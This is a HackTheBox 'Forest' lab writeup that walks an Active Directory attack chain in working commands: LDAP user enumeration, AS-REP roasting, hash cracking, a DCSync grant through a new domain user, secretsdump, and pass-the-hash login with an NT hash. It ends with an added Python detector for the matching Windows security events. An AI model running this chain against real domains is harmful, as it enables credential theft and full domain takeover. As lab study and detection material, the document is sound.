Where Notes Work
Forest Writeup | HackTheBox
nmap scan:
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-06-26 17:44:12Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
425/tcp filtered icad-el no-response
445/tcp open syn-ack Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
Domain: htb.local
Host: FOREST
Enumerating users with enum4linux and ldapsearch
enum4linux -a -u '' -p '' 10.10.10.161
Using ldapsearch to enumerate users and groups:
ldapsearch -x -H ldap://10.10.10.161 -b "dc=htb,dc=local"
ldapsearch -x -H ldap://10.10.10.161 -b "dc=htb,dc=local" "objectclass=user" samaccountName | grep sAMAccountName
After getting the users, save them to a file; after that, I used Impacket's GetNPUsers tool to get the Kerberos (AS-REP) hashes.
impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161 -usersfile users -no-pass
After getting the hash, I cracked it using john with the krb5asrep format.
john --format=krb5asrep alfreso.hashes --wordlist=rockyou.txt
After that, connect using evil-winrm. Checking the user's groups showed that the user is in the Service Accounts group. I then ran SharpHound.exe and uploaded the output to BloodHound.
Checking the shortest path to Domain Admins showed that the Exchange Windows Permissions group has “Write Dacl” on Domain Admins.
As I am in the Service Accounts group, I have the ability to create a new user and add it to groups, but not to high-privilege groups. I added a new user, added it to “Exchange Windows Permissions”, and then used the command BloodHound provides for the Write Dacl misconfiguration to abuse the DACL.
# adding new user to domain
C:\> net user fuser hacker123 /add /domain
# adding user to Exchange Windows Permissions group
C:\> net group "Exchange Windows Permissions" fuser /add /domain
# granting DCSync rights on the domain object with PowerView's Add-DomainObjectAcl (PowerView must be imported first)
# the password matches the one set with net user above; passing -Credential makes the new group membership take effect without logging in again
$SecPassword = ConvertTo-SecureString 'hacker123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb\fuser', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -Principal fuser -Rights DCSync
After that, I used secretsdump to dump the hashes.
$ impacket-secretsdump htb.local/fuser:hacker123@10.10.10.161
After getting the hashes, log in as Administrator using the NT hash.
$ evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
rooted.
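From the defender's side, the two loudest steps of this chain leave distinct traces in the Windows Security log: the AS-REP roast shows up as event 4768 with pre-authentication type 0, and the DCSync that secretsdump performs shows up as event 4662 requesting the replication extended rights from an account that is not a domain controller. The script below is an added example, not part of the original writeup, that triages constructed sample events for both; the account name svc-roastable is hypothetical, FOREST$ is assumed to be the DC computer account, and fuser is the account created above.

```python
# Added detection example (not from the original writeup): flags 4768 events with
# PreAuthType 0 (the AS-REP roast GetNPUsers relies on) and 4662 events requesting
# replication rights from a non-DC account (the DCSync secretsdump performs).
# All event records below are constructed samples, not real logs.
from dataclasses import dataclass

# Well-known extended-right GUIDs that DCSync replication requires.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

@dataclass
class Event:
    event_id: int
    fields: dict

def is_asrep_roast(ev: Event) -> bool:
    # PreAuthType "0" = TGT issued without Kerberos pre-authentication.
    return ev.event_id == 4768 and ev.fields.get("PreAuthType") == "0"

def is_dcsync(ev: Event, dc_accounts: set) -> bool:
    # 4662 lists requested rights as GUIDs in Properties; only domain
    # controller computer accounts should ever ask for replication rights.
    if ev.event_id != 4662:
        return False
    props = ev.fields.get("Properties", "").lower()
    subject = ev.fields.get("SubjectUserName", "")
    return any(g in props for g in REPLICATION_RIGHTS) and subject not in dc_accounts

def triage(events, dc_accounts):
    """Return (label, account) findings in event order."""
    findings = []
    for ev in events:
        if is_asrep_roast(ev):
            findings.append(("asrep-roast", ev.fields["TargetUserName"]))
        elif is_dcsync(ev, dc_accounts):
            findings.append(("dcsync", ev.fields["SubjectUserName"]))
    return findings

# Constructed samples: a hypothetical roastable account, the DC FOREST$
# replicating legitimately, and the writeup's fuser performing DCSync.
SAMPLE_EVENTS = [
    Event(4768, {"TargetUserName": "svc-roastable", "PreAuthType": "0"}),
    Event(4768, {"TargetUserName": "administrator", "PreAuthType": "2"}),
    Event(4662, {"SubjectUserName": "FOREST$", "Properties": DS_REPLICATION_GET_CHANGES_ALL}),
    Event(4662, {"SubjectUserName": "fuser", "Properties": "{" + DS_REPLICATION_GET_CHANGES + "}"}),
]
if __name__ == "__main__":
    for label, account in triage(SAMPLE_EVENTS, {"FOREST$"}):
        print(f"{label}: {account}")
```

The same two checks map directly onto a SIEM rule: alert on any 4662 carrying these GUIDs whose subject is not a DC computer account, and review 4768 events with pre-authentication type 0 for accounts that should require pre-auth.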